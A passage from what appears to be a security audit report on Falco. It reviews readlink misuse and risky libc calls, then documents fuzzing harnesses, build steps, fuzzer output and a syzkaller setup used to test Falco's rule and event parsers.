readlink returnssizeof(buf)\nline 10 of the example above, then, the if condition statement is true and the content of the\nbuffer at the maximum size of sizeof(buf) is copied into mem_file . Later, line 15, an output\nfile stream is created based on this path and written to, line 18. So if the realpath is long enough,\nit\u2019s possible to write to a different location than expected.\nIn theory, the program could use the symlink and let the kernel redirect the writing operation to\nthe correct file but it seems that the functions want to return the realpath to the caller, line 22.\nWe tried to exploit this bug but it seems that this method is private and never referenced in the\nwhole codebase. So maybe this can be deleted instead of refactored.\nRef: 23-01-1097-LIV 22 Quarkslab SASINFO 8 Return value in various usage of readlink is not checked which could lead to\nwrite to a different file\nCategory Unchecked return value\nRating Impact: Confidentiality Exploitability : None\nConclusion on readlink\nTo conclude on the readlink syscall, there are three main issues in its usage:\n1.readlink does not append a null byte to the buffer which could lead to buffer overflow if\nnot manually written.\n2.The return value is often used as an index to write the terminating zero but could go out of\nboundsifthe bufsize ,thethirdargumentisequalto sizeof(buf) andnotsizeof(buf)-1 .\n3.The return value should be checked not only against -1but also when it\u2019s equal to bufsize ,\nthe third argument. It could imply that truncation may have occurred, ending up with a\npath to the wrong file.\n6.2.2 Checks on sensitive functions\nHere is a non comprehensive list of common functions known to be unsafe in the sense that\nthey can easily be misused and can lead to crashes or buffer overflow attacks when used with\nuser-controlled inputs. Some are also not mentioned because they don\u2019t appear in the codebase.\n\u2022gets- the \u201cinsecure by default\u201d getsis not used in the codebase, its more safe counterpart\nfgetsis, however.\n\u2022strcpy- there are 30 occurences of strcpy, which could be replaced with safer strncpy or\nevenstrlcpy which don\u2019t assume infinitely long string and can guarantee null termination\nin some cases.\n\u2022sprintf - there are 21 occurrences of sprintf that could be replaced with snprintf ,\nwhich don\u2019t assume infinitely long string.\n\u2022sscanf- there are 45 occurences of sscanf, mostly to parse structured files in procfs that\ncannot be directly manipulated by users.\n\u2022realloc - the interface of realloc can lead to misuses. realloc is called 22 times in\nthe codebase, irregularly, sometimes checking the return value properly and sometimes\nwithout. Even if this issue could be theoretical because memory allocation failing can be\nthe symptom of greater issues, it\u2019s good practice to properly check the return value.\n\u2022access- there are 4 occurences of access. It\u2019s typically used to know if the effective user\nhas the right to access a file before opening it but present security issues because of potential\nTOCTOU vulnerability it creates. However, when searching we found two usages in libscap,\nmostly on files in procfs that cannot be modified, and two usages in libinsp, mostly to checks\nfiles, all seeming non-problematic.\nRef: 23-01-1097-LIV 23 Quarkslab SAS\u2022atoi- there are 7 occurences of atoi, it seems that atof,atoloratollare not used\nin the project. The function is used mostly in example and test code but also in lib-\nscap/scap_procs.c , inengine/bpf/scap_bpf.c and twice in libsinsp/container_en-\ngine/docker/async_source.cpp . The issue is that atoidoes not detect errors and just\nreturns 0 for error cases. This function can be replaced with strtolorsscanfwhich can\nhandle the error cases properly.\n\u2022realpath - there are 2 occurrences of realpath inchisel/chisel_utils.cpp , that can\nbe vulnerable to directory traversal attacks, symlink attacks or resource exhaustion. In\nthose specific cases, realpath is called with the second argument as the nullptr so the\nfunction allocated a buffer automatically with a size up to PATH_MAX or return an error.\nMost of these functions are not inherently insecure (except maybe for gets), but their usage\ncan be problematic in some situations. Some assume that strings can be infinitely long where\ndestination buffers are very finite, others have their return value typically badly handled or can\ncreate race conditions. Some have safer alternatives, that are not inherently secure but put an\nemphasis on what should be correctly taken care of.\n6.2.3 Third-party dependencies version\nFalco being built with various dependencies, we checked for CVE on those libraries, especialy\nthose potentially being exposed to the end user. For example, a minimalistic HTTP server based\non cpp-httplib9is embedded in Falco userland process, which just answers to GET /healthz with\n{\"status\": \"ok\"} , enabling some external monitoring.\nIf those dependencies are not all up to date, they are however regularly updated and none of the\nCVEs were applicable to the context of use in Falco.\n6.2.4 Conclusion\nMost of the time dedicated to the manual review of the code was spent on libscap because it\u2019s a\nC component that interacts with the system implementation details and interfaces using many\nsyscalls and libc functions. Globally the code quality of Falco is good, but as we saw during our\nresearch on specific pain points, the quality can sometimes be heterogeneous (similar syscalls or\nlibc functions called in different ways), which is not surprising in popular open source project.\n9https://github.com/yhirose/cpp-httplib\nRef: 23-01-1097-LIV 24 Quarkslab SAS7 Dynamic analysis\nOne of the main focuses of this audit was to build fuzzers for security-relevant areas of Falco.\nThe threat model built during this audit was helpful to define which area should be investigated.\nAlthough the attack surface considered was mostly the one a random unprivileged user on the\nsystem has to interact with Falco, some early investigations were done on components a priori\nonly available to super users.\nIndeed, a first fuzzer was built for the rules parser because it was quite natural to fuzz and a\ngood first project for Quarkslab\u2019s engineers to get familiar with the build system.\n7.1 Fuzzing the rules parser\nFirst, the diagram on the Figure 7.1 was used to visualize the attack surface of Falco. Please note\nthat this figure is a bit dated at the moment, because of the new plugin mechanism that can\nhandle Kubernetes audit events as any other plugin.\nFigure 7.1: Falco architecture from the project documentation\nFrom the userland, there are two entries to the program in YAML, one is the configuration, which\nshould be a simple parsing, and another the rules Falco should use to filter the events. Writing\ntext parsers in C/C++ is notoriously error-prone so it was a good first target for fuzzing although\nit\u2019s not a priority considering the fact that these files should be accessible only by superusers.\nFalco maintainers did a rewrite in C++ of their rule parser recently, it was previously written in\nLua. This work was done in a PR untitled refactor(libsinsp): renovate the filter grammar, parser,\nand compiler1with a proposed grammar in EBNF syntax.\n1https://github.com/falcosecurity/libs/pull/217\nRef: 23-01-1097-LIV 25 Quarkslab SASHarness\nThe interface of the parser is ideal to implement fuzzing. A parserobject has to be initialized\nwith a string as an input and then parse() needs to be called. It\u2019s possible to write a basic\nlibfuzzer harness like the following piece of code, directly inspired by test files that use a similar\ncode.\n#include <filter/parser.h>\n#include <string.h>\nextern\"C\" intLLVMFuzzerTestOneInput( uint8_t* data, size_tsize)\n{\nchar* in = ( char*)malloc(size + 1);\nmemcpy(in, data, size);\nin[size] = '\\0';\nlibsinsp::filter::parser parser(in);\ntry\n{\nparser.parse();\n}\ncatch(std::runtime_error& e)\n{\n// do not crash on handled exceptions, ignore.\n}\nfree(in);\nreturn0;\n}\nListing 1: Harness for fuzzing the rules parser\nTo build this harness, the code was put in a dedicated file in the libsinsp/examples folder,\nmodifying the local CMakeLists.txt adding the following lines.\nadd_executable(fuzz-example\nfuzz.cpp\n)\ntarget_link_libraries(fuzz-example\nsinsp\n)\nAnd adding the following lines at the top CMakeLists.txt of libs to enable ASAN.\nadd_compile_options(-fsanitize=address)\nadd_link_options(-fsanitize=address)\nRef: 23-01-1097-LIV 26 Quarkslab SASCorpus\nTo generate a corpus of rules quickly, test case strings were gathered very quickly with a command\nsimilar to the following ones. This is not ideal since it will generate wrong inputs that will be\ndiscarded by the fuzzer quickly. Lines were also extracted in a crude way from the default rules\nfiles in YAML.\ngrep -v EXPECT filter*.ut.cpp | grep -e '\".*\" '-o | cut -d \"\\\"\" -f 2 | split -l 1\nyq'.[].condition '../falco_rules.yaml | uniq | split -l 1\nResults\nThe harness on Listing 1 was used for persistent mode fuzzing with HonggFuzz for almost 14\nhours, see Figure 7.2, it did not run into any crashes during the whole fuzzing session.\nFigure 7.2: Results of fuzzing in persistent mode with Honggfuzz for a night\nSimilarly, AFL++ was run over the harness in the persistent mode for a shorter amount of time to\nsee if it could spot other issues but it did not during our experimentations. Please note that to do\nthe same with AFL++ you need to add some boilerplate code that you can find in Appendix E.\nRef: 23-01-1097-LIV 27 Quarkslab SASFigure 7.3: Results of fuzzing in persistent mode with AFL++ for 8 hours with 4 instances\nThis does not mean that the parser is bug-free, but at least no bug would produce a crash was\nfound during the fuzzing session, and the harness was compiled with ASAN to produce explicit\ncrashes on memory errors. The coverage produced by the fuzzing session was checked manually\nand it seemed like the fuzzer went over most of the codebase of the parser successfully.\n7.2 Fuzzing the event processor\nHaving the goal of building fuzzers for the userspace part of Falco, the main target was the\nsinsp_parser::process_event function. This function takes a pointer to an event as input and\ncan be seen as a router to the appropriate parser for the encoded event. For example, if the event\nhappens to be a PPME_SYSCALL_PIPE_X , which is the exit Falco event for the pipe(2) syscall, this\nfunction will redirect the execution to parse_pipe_exit . The parser will then retrieve the event\nparameters in the following manner.\n// [...]\nparinfo = evt->get_param(0);\nretval = *( int64_t *)parinfo->m_val;\nASSERT(parinfo->m_len == sizeof(int64_t));\n// [...]\nparinfo = evt->get_param(1);\nASSERT(parinfo->m_len == sizeof(int64_t));\nfd1 = *( int64_t *)parinfo->m_val;\n// [...]\nFuzzing such big \u201crouter\u201d would be interesting since the implementation is tedious and verifying\nRef: 23-01-1097-LIV 28 Quarkslab SASthere is no error in this code might be even harder. The issue is that forming a valid, but random,\nevents (i.e., doing structured fuzzing) for so many different events is difficult.\nOntopofthat, anotherdifficultyisthatsomeparsersdonotactuallyparseallthebuffercontaining\nthe event\u2019s arguments. These arguments are later \u201clazy loaded\u201d when filtering is happening on\nthese specific events fields to reduce the overall load. That\u2019s why it might not be sufficient, in\norder to reach the code that would trigger an issue, to only ingest the events with the parsers.\nThat\u2019s an illustration of a case in which fuzzing could be more complex and more time consuming\nthan doing a manual review, especially because the target is parsing a highly structured format\nand might not be built with fuzzing in mind.\nSee in the following sections multiple ideas investigated by Quarkslab\u2019s engineers. The order does\nnot reflect the chronological reality. Usage of libprotobuf-mutator was investigatedin Section 7.2.1\nin order to do structured fuzzing targeted directly at particular event parsers. Then usage of\nsyzkaller in Section 7.2.2 was explored, to fuzz the syscalls on a system with an instrumented\nversion of Falco running and getting coverage in the kernel engine. And then, fuzzing the scap\nfile format in Section 7.2.3 was looked into for unstructured fuzzing, it mostly uncovered issues\nin the file format handling.\n7.2.1 Using libprotobuf-mutator\nFor structured fuzzing in C/C++, libprotobuf-mutator2is a library to randomly mutate protobuf\nmessage. It could be used together with guided fuzzing engines, such as libFuzzer. The overall\nidea is to define a structure in protobuf format and libprotobuf-mutator will mutate the fields\nwith type-valid values.\nFalco maintainers pointed us to the driver/event_table.c files inlibsthat defines all the\nevents supported by Falco. See the following listing for an extract of that structure.\n// [...]\n/* PPME_SYSCALL_CLOSE_E */ {\"close\", EC_IO_OTHER | EC_SYSCALL, EF_DESTROYS_FD |\nEF_USES_FD | EF_MODIFIES_STATE, 1, {{\"fd\", PT_FD, PF_DEC} } }, \u25c1arrowhookleft\u2192\n/* PPME_SYSCALL_CLOSE_X */ {\"close\", EC_IO_OTHER | EC_SYSCALL, EF_DESTROYS_FD |\nEF_USES_FD | EF_MODIFIES_STATE, 1, {{\"res\", PT_ERRNO, PF_DEC} } }, \u25c1arrowhookleft\u2192\n/* PPME_SYSCALL_READ_E */ {\"read\", EC_IO_READ | EC_SYSCALL, EF_USES_FD |\nEF_READS_FROM_FD, 2, {{\"fd\", PT_FD, PF_DEC}, {\"size\", PT_UINT32, PF_DEC} } }, \u25c1arrowhookleft\u2192\n/* PPME_SYSCALL_READ_X */ {\"read\", EC_IO_READ | EC_SYSCALL, EF_USES_FD |\nEF_READS_FROM_FD, 2, {{\"res\", PT_ERRNO, PF_DEC}, {\"data\", PT_BYTEBUF, PF_NA} }\n},\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n// [...]\nIn addition of this file, a documentation page is available on the Falco website3. More importantly,\nthis page displays which syscalls are monitored by default, for performance reasons, without\nspecifying the -Aflag that enables everything. Thus, the default list, on top of the syscalls that\n2https://github.com/google/libprotobuf-mutator\n3https://falco.org/docs/rules/supported-events/\nRef: 23-01-1097-LIV 29 Quarkslab SASare typically available in Kubernetes containers enviromnent4, can be used to make a priority list\nof syscalls parsers that should be fuzzed with structured fuzzing.\nCompiling libprotobuf-mutator\nOne of the main difficulties was to link a binary with libprotobuf-mutator which was using a\ndifferent version of protobuf than Falco. The solution to link without bothering with missing\nsymbols or multiple definitions is to align the protobuf version used by libprotobuf-mutator with\nthe one used by Falco. Fortunately, libprotobuf-mutator v1.1 compiles with an older protobuf\nversion.\ngit clone https://github.com/google/libprotobuf-mutator.git\ncd libprotobuf-mutator\ngit checkout v1.1\nIn the file cmake/external/protobuf.cmake , modify line 66 with GIT_TAG v3.17.3 , which is\nthe version used by Falco at the moment of the audit (see 3.2).\nmkdir build\ncd build\ncmake .. -GNinja -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++\n-DCMAKE_BUILD_TYPE=Debug -DLIB_PROTO_MUTATOR_DOWNLOAD_PROTOBUF=ON \u25c1arrowhookleft\u2192\nninja\nAt this point we successfully compiled a version of libprotobuf-mutator compatible with the\nprotobuf version Falco use.\nWriting the proto file and the harness\nThe example here will use the events associated with the open(2) syscall.\nFirst, a proto file must be written containing the value types needed for filling the arguments of\nthe event we want to generate. Unfortunately, protobuf cannot take expression as input for enum\nvalues, so all bitwise flag values must be written directly, instead of using the practical 1 \u00ab N\nnotation. In our situation, the proto file will look like the abbreviated following version (see the\nfull proto definition in the listing in Appendix F).\nsyntax= \"proto3\";\npackage sys_open ;\nmessage event_args {\nuint64fd = 1;\nstringfspath = 2;\nrepeated FILE_FLAGS flags32 = 3;\n4Restricted seccomp profiles are still not applied by default in Kubernetes, but Linux capabilities are already restricted,\nthus reducing the syscalls available even running as root.\nRef: 23-01-1097-LIV 30 Quarkslab SASFILE_MODE mode = 4;\nuint32dev = 5;\nuint64ino = 6;\n}\n// [...]\nThen generate the C++ stubs with the protobuf compiler, make sure to use the one\ncompiled along libprotobuf-mutator, it\u2019s available in the project build folder libprotobuf-\nmutator/build/external.protobuf/bin/protoc .\nprotoc --version # this should output \"libprotoc 3.17.3\"\nprotoc --cpp_out=. sys_open.proto\nThis command should generate two files, sys_open.pb.cc andsys_open.pb . Now, a piece of\ncode must be written, using the generated input to fuzz our parsers: the harness. Thanks to\nthe help of a Falco maintainer, we modified a version of the sinsp_with_test_input.h \u2019s class\nsinsp_with_test_input to add our event on an inspector. The resulting harness is similar to\nthe following piece of code.\n1 #include <parsers.h>\n2\n3 #include \"sinsp_fuzz.h\"\n4 #include \"sys_open.pb.h\"\n5\n6 #include \"libprotobuf-mutator/src/libfuzzer/libfuzzer_macro.h\" // defines DEFINE_PROTO_FUZZER\n7\n8 int32_t fuzz_bitwise_flag = 0;\n9\n10 static protobuf_mutator::libfuzzer::PostProcessorRegistration<sys_open::event_args> reg = {\n11 [](sys_open::event_args* msg, unsigned int seed)\n12 {\n13 fuzz_bitwise_flag = 0;\n14 for(int32_t flag : msg->flags32())\n15 {\n16 fuzz_bitwise_flag |= flag;\n17 }\n18 }};\n19\n20 DEFINE_PROTO_FUZZER( const sys_open::event_args& msg)\n21 {\n22 sinsp_fuzz s;\n23\n24 s.SetUp();\n25 s.add_default_init_thread();\n26 s.open_inspector();\n27\n28 auto evt = s.add_event_advance_ts(s.increasing_ts(), 1, PPME_SYSCALL_OPEN_E, 3,\nmsg.fspath().c_str(), fuzz_bitwise_flag, msg.mode()); \u25c1arrowhookleft\u2192\n29 evt->load_params();\n30\n31 evt = s.add_event_advance_ts(s.increasing_ts(), 1, PPME_SYSCALL_OPEN_X, 6, msg.fd(),\nmsg.fspath().c_str(), fuzz_bitwise_flag, msg.mode(), msg.dev(), msg.ino()); \u25c1arrowhookleft\u2192\n32 evt->load_params();\n33\n34 s.TearDown();\n35 }\nRef: 23-01-1097-LIV 31 Quarkslab SASTheDEFINE_PROTO_FUZZER macro and the post processor are part of the libFuzzer integration of\nlibprotobuf-mutator, see the section in the README for more details5. To detail the example here,\non the line 11 of harness, a lambda is defined to post process the generated protobuf message in\norder to create a file flags argument with one or more bits set one. From line 20 to line 35 is the\npart of the code that will be replayed by libFuzzer.\nAt this point we have a protobuf definition that is used in a libFuzzer harness and the compiled\nprotobuf-mutator libraries.\nCompile with libFuzzer\nTo compile with LLVM libFuzzer, you mostly need to pass the -fsanitize=fuzzer flag to clang.\nPlease note that you mustcompile with clang and not gcc. To compile everything that was\npresented in the last sections, use the following lines in the CMakeLists.txt oflibsinsp/test ,\nfixing the relative paths, or create a new one under libsinsp/test/fuzz with the following\ncontent.\nadd_compile_options(-fsanitize=fuzzer,address)\nadd_link_options(-fsanitize=fuzzer,address)\nadd_executable(fuzz_sys_open\nsys_open.pb.cc\n../test_utils.cpp\nfuzz_sys_open.cpp\n)\n# Set this path to your libprotobuf-mutator installation directory\nset(LIBPROTOBUF_MUTATOR_BASEDIR \"/home/mahe/falco-security/libprotobuf-mutator/\")\ntarget_include_directories(fuzz_sys_open PRIVATE\n\"${LIBPROTOBUF_MUTATOR_BASEDIR}\"\n# no need for the following, already included with others Falco dependencies\n# \"/home/mahe/falco-security/libprotobuf-mutator/buildy/external.protobuf/include\")\n)\ntarget_link_libraries(fuzz_sys_open\n\"${LIBPROTOBUF_MUTATOR_BASEDIR}/build/src/libfuzzer/libprotobuf-mutator-libfuzzer.a\"\n\"${LIBPROTOBUF_MUTATOR_BASEDIR}/build/src/libprotobuf-mutator.a\"\n# no need for the following, already included with others Falco dependencies\n# \"/home/mahe/falco-security/libprotobuf-mutator/build-test/external.protobuf/lib/libprotobufd.a\"\nsinsp\n)\nFor ASAN to work on the whole code, the following lines must be added at the beginning of the\nrootCMakeLists.txt .\nadd_compile_options(-fsanitize=address)\nadd_link_options(-fsanitize=address)\nTo reproduce exactly this setup, we generated a diff that can be applied to falco libsrepo from\nversion described in Table 3.2, tag 0.9.0, see the file named sys_open_fuzz.diff . Go to the root\nof the git libsrepository and type the following commands.\n5https://github.com/google/libprotobuf-mutator#integrating-with-libfuzzer\nRef: 23-01-1097-LIV 32 Quarkslab SASgit checkout 0.9.0\ngit apply sys_open_fuzz.diff\nmkdir build\ncd build\ncmake -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ ..\nmake # try to use -j <nbthreads>\nFuzzing with LLVM libFuzzer\nUnlike HonggFuzz or AFL++, LLVM libFuzzer adds the fuzzer directly to the compiled binary.\nThus to start the fuzzing session, just execute the binary and use libFuzzer\u2019s flags. You can find\nthe documentation on the LLVM website6to learn about the available flags and understand the\noutput format. It\u2019s possible to run the fuzzer with multiple workers and monitor the logs using\ntailon the multiple generated files. If libFuzzer finds a crash, it will stop and generate a file\ncontaining the Protobuf message in text format7. It\u2019s possible to provide an existing corpus with\nthe same format.\nStarting the fuzzing, the output for fuzz_sys_open should be similar to this.\nINFO: found LLVMFuzzerCustomMutator (0x934350). Disabling -len_control by default.\nINFO: Running with entropic power schedule (0xFF, 100).\nINFO: Seed: 1989839396\nINFO: Loaded 1 modules (830 inline 8-bit counters): 830 [0x20899d4, 0x2089d12),\nINFO: Loaded 1 PC tables (830 PCs): 830 [0x1d47f60,0x1d4b340),\nINFO: -max_len is not provided; libFuzzer will not generate inputs larger than 4096 bytes\nINFO: A corpus is not provided, starting from an empty corpus\n#2 INITED cov: 120 ft: 121 corp: 1/1b exec/s: 0 rss: 51Mb\nNEW_FUNC[1/3]: 0x92e630 in sys_open::event_args::~event_args()\n/home/mahe/falco-security/libs/userspace/libsinsp/test/fuzz/sys_open.pb.cc:193 \u25c1arrowhookleft\u2192\nNEW_FUNC[2/3]: 0x931a00 in void google::protobuf::internal::InternalMetadata::DeleteOutOfLin \u230b\neHelper<google::protobuf::UnknownFieldSet>()\n/home/mahe/falco-security/libs/build/protobuf-prefix/src/protobuf/target/include/google/ \u230b\nprotobuf/metadata_lite.h:190\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n#3 NEW cov: 131 ft: 136 corp: 2/11b lim: 4096 exec/s: 0 rss: 53Mb L: 10/10 MS: 7\nEraseBytes-EraseBytes-ShuffleBytes-CMP-CrossOver-ChangeBit-Custom- DE:\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"-\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n#5 NEW cov: 133 ft: 138 corp: 3/47b lim: 4096 exec/s: 0 rss: 54Mb L: 36/36 MS: 3\nCustomCrossOver-InsertByte-Custom- \u25c1arrowhookleft\u2192\n#41 REDUCE cov: 133 ft: 138 corp: 3/44b lim: 4096 exec/s: 0 rss: 67Mb L: 33/33 MS: 2\nChangeByte-Custom- \u25c1arrowhookleft\u2192\n#142 REDUCE cov: 133 ft: 138 corp: 3/23b lim: 4096 exec/s: 0 rss: 104Mb L: 12/12 MS: 1 Custom-\n#278 NEW cov: 134 ft: 139 corp: 4/50b lim: 4096 exec/s: 0 rss: 153Mb L: 27/27 MS: 2\nCMP-Custom- DE: \"proto2\"- \u25c1arrowhookleft\u2192\n#380 REDUCE cov: 134 ft: 139 corp: 4/40b lim: 4096 exec/s: 0 rss: 189Mb L: 17/17 MS: 4\nShuffleBytes-Custom-EraseBytes-Custom- \u25c1arrowhookleft\u2192\n#811 REDUCE cov: 134 ft: 139 corp: 4/37b lim: 4096 exec/s: 811 rss: 341Mb L: 7/17 MS: 2\nCopyPart-Custom- \u25c1arrowhookleft\u2192\n#4096 pulse cov: 134 ft: 139 corp: 4/37b lim: 4096 exec/s: 2048 rss: 393Mb\n#4118 REDUCE cov: 134 ft: 139 corp: 4/32b lim: 4096 exec/s: 2059 rss: 393Mb L: 7/17 MS: 5\nCustomCrossOver-ShuffleBytes-CopyPart-CopyPart-Custom- \u25c1arrowhookleft\u2192\n#6326 REDUCE cov: 135 ft: 140 corp: 5/78b lim: 4096 exec/s: 1581 rss: 394Mb L: 46/46 MS: 5\nPersAutoDict-CustomCrossOver-Custom-CMP-Custom- DE: \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"-\"(NULL)\"- \u25c1arrowhookleft\u2192\n#6457 REDUCE cov: 135 ft: 140 corp: 5/56b lim: 4096 exec/s: 1614 rss: 394Mb L: 24/24 MS: 1 Custom-\n6https://llvm.org/docs/LibFuzzer.html\n7https://developers.google.com/protocol-buffers/docs/text-format-spec\nRef: 23-01-1097-LIV 33 Quarkslab SAS#6918 REDUCE cov: 135 ft: 140 corp: 5/49b lim: 4096 exec/s: 1729 rss: 394Mb L: 17/17 MS: 2\nCopyPart-Custom- \u25c1arrowhookleft\u2192\n#8192 pulse cov: 135 ft: 140 corp: 5/49b lim: 4096 exec/s: 1638 rss: 394Mb\n#8564 REDUCE cov: 135 ft: 140 corp: 5/48b lim: 4096 exec/s: 1712 rss: 394Mb L: 6/17 MS: 2\nCMP-Custom- DE: \"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"- \u25c1arrowhookleft\u2192\n#16384 pulse cov: 135 ft: 140 corp: 5/48b lim: 4096 exec/s: 1820 rss: 395Mb\nFuzzing the SYS_CLONE_20_X event handler\nAfter trying on sys_open , we selected a syscall that had a more complex handler on the userspace\nside.sys_clone_20_x was choosen, notably because it has a large number of arguments: twenty,\nand some could be manipulated by a simple user on the system. So we decided to mutate only the\nfields that could be influenced by an attacker, i.e. the exe path, args, comm, and flags, meaning\nthat in the end mostly string buffers were fuzzed. In the end, the fuzzing was pretty restricted\nand concerned mostly string buffers, so it was very limited and could have been checked by\na manual analysis. Unsurprisingly, in the end, fuzzing the handler with the harness did not\ntriggered crashes.\nHowever, the same method can be used to fuzz the entirety of the arguments, to find bugs that\nmay not be security relevant. Nevertheless, it confirms that writing security relevant harness can\nbe more time consuming than reviewing the code manually, considering as well that it can be\nharder to detect some issues by just reading the source and manual review should in addition of\na dynamic analysis.\nAttached to the report, you will find a git diff named, sys_clone_fuzz.diff containing both\nthe changes for the open and clone syscalls from the tag 0.9.0or more precisely, the version\nspecified in Table 3.2.\nConclusion\nFor structured fuzzing, libprotobuf-mutator is appropriate in order to create random structures,\nbut it\u2019s a bit complex and time-consuming to setup. The drawback is mainly that multiple highly\ntargeted harnesses must be written in order to fuzz a significant amount of code, and thus find\nbugs. Manual review of the function could be more time efficient in certain situations. On top of\nthat, by creating the proto definition and the harness, we need to have a very precise knowledge\non what could be the possible inputs and not make potential false assumptions. It should be\ncombined with random fuzzing that make fewer assumptions in order to find potential issues on\nthe format itself and not just on the range of possible values.\nBecause writing and maintaining a large quantity of custom harness could be burdensome,\nwe can even project that the proto definition and C++ harness could be generated from the\nevent_table.c automatically. But again creating such program could exceed the cost in time of\na manual review.\nFor the conclusion of the specific examples, on sys_open andsys_clone_20_x , fuzzing sessions\ncould not trigger crashes with the harnesses presented in this report.\nRef: 23-01-1097-LIV 34 Quarkslab SAS7.2.2 Using syzkaller\nFor fuzzing related to syscalls, the syzkaller8project can be interesting. It\u2019s technically an\nunsupervised coverage-guided kernel fuzzer but also a group of binaries and libraries that can be\nused separately to generate valid syscall programs and mutate them. The advantage of using this\nproject as a base for creating valid event for Falco is that multiple people already took the time to\ndescribe syscalls (their arguments, return values) in a specific domain language9.\nThere are two ways to see how syzkaller could be used on Falco.\n1.The whole syzkaller stack could be used as intended, fuzzing the entire system on which\nFalco is installed and running. The coverage will come from the system code and not from\nFalco\u2019s so it can be seen as random fuzzing without guidance.\n2.The library in charge of mutating programs could be used to form valid Falco events (at least\nenter events). It can be used similarly as in the syz-mutate tool10. It\u2019s still random fuzzing\nand more should be written to actually create a fuzzer from this idea: interfacing with the\nC library containing the process_event function, catching signals as a fuzzer would do,\netc.\nFor the second point, in order to get an idea of what syzkaller is capable, you can clone the\nrepository, compile the binaries and use syz-mutate to generate valid programs. Here is an\nextract mutating a lot of open(2) syscalls using ./syz-mutate --len 2000 --enable open .\n[...]\nopen$dir(&(0x7f0000146fc0)= './file64\\x00 ', 0x8840, 0x1d1)\nopen$dir(&(0x7f0000147000)= './file4aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \u230b\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \u230b\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \u230b\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \u230b\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \u230b\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \u230b\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \u230b\naaaa\\x00 ', 0x193000,\n0x40)\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\nopen(&(0x7f0000147240)= './file60\\x00 ', 0x191180, 0x44)\nopen(&(0x7f0000147280)= './file7\\x00 ', 0x40100, 0x14)\nopen$dir(&(0x7f00001472c0)= './file36\\x00 ', 0x420002, 0x32)\nopen$dir(&(0x7f0000147300)= './file1/file1/file0/file1\\x00 ', 0x240040, 0x20)\nFuzzing the Falco kernel module with syzkaller\nFor the first point, we mainly followed the syzkaller documentation11to setup a QEMU VM on a\nUbuntu host. Some small modifications are required to integrate Falco.\n8https://github.com/google/syzkaller\n9https://github.com/google/syzkaller/blob/master/docs/syscall_descriptions.md\n10https://github.com/google/syzkaller/blob/master/tools/syz-mutate/mutate.go\n11https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_\nx86-64-kernel.md\nRef: 23-01-1097-LIV 35 Quarkslab SAS\u2022First, in the kernel config parameters, in addition to the required config options for syzkaller,\nwe also added CONFIG_KCOV_ENABLE_COMPARISONS=y . This is not required but gives better\ncoverage results based on our experiments. A second point, which is required to enable\ncoverage of dynamic loaded module and so to get Falco driver coverage, is to disable KASLR\nby adding CONFIG_RANDOMIZE_BASE .\n\u2022Once the kernel was built, we built Falco\u2019s driver using the same kernel source code, in order\nto get instrumentation into the module. To do this, there is just a small modification to do in\nhttps://github.com/falcosecurity/libs/blob/master/driver/Makefile.in which\ndefinesKERNELDIR as:\nKERNELDIR ?= /lib/modules/$(shell uname -r)/build\nWe just have to fix this with the folder used to build our kernel.\n\u2022Then we need to build the Falco userland process inside the target image. To do this, we\nstarted the image with a temporary second drive (Falco is quite huge to build), cloned the\ngit repository into it, added the required packages to build everything and then happily got\nthe expected binary.\n\u2022Finally, we added the default falco.yaml andfalco_rules.yaml configuration files and\nconfigured Falco to start as a systemd service, based on the scripts from Falco repository.\nAt this point, restart the VM and quickly check that Falco is ready:\nLinux syzkaller 5.14.0 #4 SMP Tue Nov 22 07:04:02 EST 2022 x86_64\n...\nroot@syzkaller:~# lsmod\nModule Size Used by\nfalco 1081344 2\nroot@syzkaller:~# ps axu | grep falco\nroot 207 19.4 1.4 268792 24928 ? Rsl 22:03 0:17 /usr/bin/falco\n--pidfile=/var/run/falco.pid \u25c1arrowhookleft\u2192\nroot 282 8.0 0.0 11116 928 pts/0 S+ 22:04 0:00 grep falco\nroot@syzkaller:~# touch /root/whatever\nroot@syzkaller:~# tail -1 /var/log/user.log\nNov 23 22:05:16 syzkaller falco: 22:05:16.545542579: Error File below / or /root\nopened for writing (user=root user_loginuid=0 command=touch /root/whatever\npid=283 parent=bash file=/root/whatever program=touch container_id=host\nimage=<NA>)\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\nWe can now start syzkaller. A manager configuration file is required to specify various parameters,\nlike kernel image, \u2018sshkey\u2018 to log into the vm, number of VM, etc.\nBut in addition to the documentation sample, we also need to specify two parameters, module_-\nobjandkernel_subsystem to help syzkaller retrieve information from Falco\u2019s coverage. The\nglobal configuration we used is similar to:\n{\n\"target\" : \"linux/amd64\",\nRef: 23-01-1097-LIV 36 Quarkslab SAS\"http\": 